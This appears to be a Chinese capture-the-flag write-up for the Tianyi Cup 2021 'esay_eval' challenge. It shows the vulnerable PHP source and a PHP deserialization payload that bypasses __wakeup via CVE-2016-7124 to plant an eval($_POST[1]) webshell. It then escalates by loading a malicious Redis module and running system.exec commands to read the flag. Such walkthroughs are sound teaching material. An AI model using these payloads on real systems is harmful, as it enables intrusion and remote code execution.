[天翼杯 2021]esay_eval WP

题目源码:

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

上来是个简单(bushi)的反序列化拿shell,但是A类里面的__wakeup()函数会把我们传进去的$code属性置为空,这里我们只需要让__wakeup()函数失效,CVE-2016-7124:当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行。

<?php
class a{
    function __construct(){
        $this->code = $code;
    }
}
class B{
    function __construct(){
        $this->a = $a;
    }
}
$a = new a();
$a->code = 'eval($_POST[1]);';
$b = new B();
$b->a = $a;
echo serialize($b);
?>

得到了payload:?poc=O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:16:"eval($_POST[1]);";}}直接不犹豫连接蚁剑.当我们以为就此结束可以拿到flag我们点击根目录发现这个shell没有访问权限,但是在/var/www/html中有上传权限,所以可以通过上传恶意的so文件,通过蚁剑的redis管理插件,进行ssrf,然后包含恶意so文件(下载地址

d35ce82b2adb4d1c918381f27b3e5dc3.png

:因为插件市场这个东西,国内基本是访问不到,我在用蚁剑访问的时候,就一直转圈圈转不出来,所以可以使用github的插件仓库下载插件,然后手动放到antSword-master/antData/pulgins中,再次打开蚁剑后,会自动加载该插件(或者科学上网)

我们上传一个exp.so文件

b21def2948d2497d9fb9358a2adfee76.png

f42a8c2acdcd4784abf57d28642aa6ce.png

密码是根据/var/www/html中有个config.php.swp文件,其中有密码

63c259f23f084234812d5a89d07be38c.png

36952f562a2f4724a9ce4ef5a507e2c7.png

然后执行指令

e5a11490aedb47a79f5cec62802c2d2a.png

执行指令:

MODULE LOAD /var/www/html/exp.so
system.exec "whoami"

system.exec "ls /"
system.exec "cat /flag*"

560bfd27777c482cb996dc086020309c.png

 

 

  • 31
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值